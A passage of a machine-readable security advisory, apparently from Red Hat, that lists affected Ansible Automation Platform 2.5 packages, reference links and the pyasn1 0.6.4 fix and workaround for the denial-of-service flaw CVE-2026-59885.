"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-59885"
},
{
"category": "external",
"summary": "RHBZ#2500380",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2500380"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-59885",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-59885"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-59885",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59885"
},
{
"category": "external",
"summary": "https://github.com/pyasn1/pyasn1/commit/45bdb19eb7df4b3780fe9c912c63e99bffc39dd9",
"url": "https://github.com/pyasn1/pyasn1/commit/45bdb19eb7df4b3780fe9c912c63e99bffc39dd9"
},
{
"category": "external",
"summary": "https://github.com/pyasn1/pyasn1/releases/tag/v0.6.4",
"url": "https://github.com/pyasn1/pyasn1/releases/tag/v0.6.4"
},
{
"category": "external",
"summary": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-8ppf-4f7h-5ppj",
"url": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-8ppf-4f7h-5ppj"
}
],
"release_date": "2026-07-14T16:40:00.515000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:10:56+00:00",
"details": "For details on how to apply this update, refer to Ansible Automation Platform documentation.",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50319"
},
{
"category": "workaround",
"details": "Update to pyasn1 version 0.6.4 or later when available for your product stream. The impact is limited to availability (denial of service) \u2014 an attacker cannot access or modify data. Applications that do not process untrusted ASN.1 input are at reduced risk.",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
